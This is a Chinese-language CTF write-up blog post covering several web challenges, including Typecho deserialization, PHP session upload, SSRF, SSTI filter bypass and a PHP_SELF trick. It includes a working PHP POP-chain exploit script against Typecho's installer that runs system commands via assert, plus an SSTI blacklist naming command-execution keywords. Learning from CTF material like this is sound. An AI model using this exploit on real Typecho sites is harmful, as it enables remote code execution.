[GKCTF2020]EzTypecho

暑假恢复刷题，顺便把以前堆积的东西也都更新到博客上，清一下桌面
GKCTF这次题感觉好多都是现有CVE之类的东西，然后加一点点
题目是一个typecho的安装流程，但是安装到一半就不给安装了，想了半天不知道他想让我怎样才能安装，后来才知道是typecho在安装时install.php有一个反序列化的任意代码执行。
最后题目还要求反序列化需要一个session，需要自己想办法建立一个session

题解

typecho反序列化的pop链网上都有分析了，抄一个脚本执行任意命令
https://www.freebuf.com/vuls/155753.html

<?php
$CMD = 'system("cat /flag")';

class Typecho_Feed
{
    const RSS2 = 'RSS 2.0';
    const ATOM1 = 'ATOM 1.0';

    private $_type;
    private $_items;

    public function __construct() {
        //$this->_type = $this::RSS2;

        $this->_type = $this::ATOM1;
        $this->_items[0] = array(
            'category' => array(new Typecho_Request()),
            'author' => new Typecho_Request(),
        );
    }
}

class Typecho_Request
{
    private $_params = array();
    private $_filter = array();

    public function __construct() {
        $this->_params['screenName'] = $GLOBALS[CMD];
        $this->_filter[0] = 'assert';
    }
}

$exp = array(
    'adapter' => new Typecho_Feed(),
    'prefix'  => 'typecho_'
);

echo base64_encode(serialize($exp));
?>

[HFCTF2020]BabyUpload

学习了PHP的session机制，感觉还学到了点东西，懂了session是怎么存的这个题就很简单了

源码

好长一串

<?php
error_reporting(0);
session_save_path("/var/babyctf/");
session_start();
require_once "/flag";
highlight_file(__FILE__);
if($_SESSION['username'] ==='admin')
{
    $filename='/var/babyctf/success.txt';
    if(file_exists($filename)){
            safe_delete($filename);
            die($flag);
    }
}
else{
    $_SESSION['username'] ='guest';
}
$direction = filter_input(INPUT_POST, 'direction');
$attr = filter_input(INPUT_POST, 'attr');
$dir_path = "/var/babyctf/".$attr;
if($attr==="private"){
    $dir_path .= "/".$_SESSION['username'];
}
if($direction === "upload"){
    try{
        if(!is_uploaded_file($_FILES['up_file']['tmp_name'])){
            throw new RuntimeException('invalid upload');
        }
        $file_path = $dir_path."/".$_FILES['up_file']['name'];
        $file_path .= "_".hash_file("sha256",$_FILES['up_file']['tmp_name']);
        if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){
            throw new RuntimeException('invalid file path');
        }
        @mkdir($dir_path, 0700, TRUE);
        if(move_uploaded_file($_FILES['up_file']['tmp_name'],$file_path)){
            $upload_result = "uploaded";
        }else{
            throw new RuntimeException('error while saving');
        }
    } catch (RuntimeException $e) {
        $upload_result = $e->getMessage();
    }
} elseif ($direction === "download") {
    try{
        $filename = basename(filter_input(INPUT_POST, 'filename'));
        $file_path = $dir_path."/".$filename;
        if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){
            throw new RuntimeException('invalid file path');
        }
        if(!file_exists($file_path)) {
            throw new RuntimeException('file not exist');
        }
        header('Content-Type: application/force-download');
        header('Content-Length: '.filesize($file_path));
        header('Content-Disposition: attachment; filename="'.substr($filename, 0, -65).'"');
        if(readfile($file_path)){
            $download_result = "downloaded";
        }else{
            throw new RuntimeException('error while saving');
        }
    } catch (RuntimeException $e) {
        $download_result = $e->getMessage();
    }
    exit;
}
?>

[HITCON 2017]SSRFme

buu上的一个老题，又是不会做看wp的一天

给了源码

<?php
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
    }

    echo $_SERVER["REMOTE_ADDR"];

    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
    @mkdir($sandbox);
    @chdir($sandbox);

    $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
    $info = pathinfo($_GET["filename"]);
    $dir  = str_replace(".", "", basename($info["dirname"]));
    @mkdir($dir);
    @chdir($dir);
    @file_put_contents(basename($info["basename"]), $data);
    highlight_file(__FILE__);

remote_addr就是用来创建一个沙盒的，然后用shell_exec执行一个GET命令，escapeshellarg会转义所有引号再在整个参数上加一个引号，防止了命令注入，就是说只能执行GET。
这个GET就是一个GET请求，可以使用file协议什么的，通过Perl实现（是我不懂的东西）
整体效果就是把GET请求到的东西写入我们对应的沙盒文件夹中。本来想写直接写一个PHP的shell的，但是靶机不能访问外网，并且估计也设置了沙盒中的PHP文件都不能解析之类的限制，而写文件的路径也被控制在了沙盒内，跳目录什么的也不太行

[GWCTF 2019]你的名字

模板注入，一开始就猜到了，然后出题人害人，过滤的字符串给了个PHP的报错，还给了一个不存在的文件，又把路由设置了一个index.php。。。。不是我看wp我绝对猜不出来发生了什么

但是在一系列fuzz(乱按)之后发现过滤了if，for，class，这几个和ssti相关性很大的关键字，被替换为空了，但是嵌套一层也绕不过去，嵌套n层也绕不过去呜呜呜

wp是说一直测，能发现config这个没什么用的语句在列表后面，用这个绕过过滤，直到我下载了源码才知道是怎么回事

blacklist = ['import', 'getattr', 'os', 'class', 'subclasses', 'mro', 'request', 'args', 'eval', 'if', 'for',
                 ' subprocess', 'file', 'open', 'popen', 'builtins', 'compile', 'execfile', 'from_pyfile', 'local',
                 'self', 'item', 'getitem', 'getattribute', 'func_globals', 'config'];
for no in blacklist:
    while True:
        if no in s:
            s = s.replace(no, '')
        else:
            break
return s

[Zer0pts2020]Can you guess it

外国比赛的签到题，攻击点给的很明显吧，还有一个小小的有意思的地方

源码

<?php
include 'config.php'; // FLAG is defined in config.php

if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
  exit("I don't know what you are thinking, but I won't let you read it :)");
}

if (isset($_GET['source'])) {
  highlight_file(basename($_SERVER['PHP_SELF']));
  exit();
}

$secret = bin2hex(random_bytes(64));
if (isset($_POST['guess'])) {
  $guess = (string) $_POST['guess'];
  if (hash_equals($secret, $guess)) {
    $message = 'Congratulations! The flag is: ' . FLAG;
  } else {
    $message = 'Wrong.';
  }
}
?>
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Can you guess it?</title>
  </head>
  <body>
    <h1>Can you guess it?</h1>
    <p>If your guess is correct, I'll give you the flag.</p>
    <p><a href="?source">Source</a></p>
    <hr>
<?php if (isset($message)) { ?>
    <p><?= $message ?></p>
<?php } ?>
    <form action="index.php" method="POST">
      <input type="text" name="guess">
      <input type="submit">
    </form>
  </body>
</html>

两个点，一个是$_SERVER[‘PHP_SELF’]，这个是返回PHP当前目录与根目录的相对路径，但是访问路径被修改的话这个变量的内容也会对应的更改，如果我们访问的内容是url/index.php/config.php的话，$_SERVER[‘PHP_SELF’]的内容就是index.php/config.php，然后再用basename()获取到config.php，但是这样子过不了正则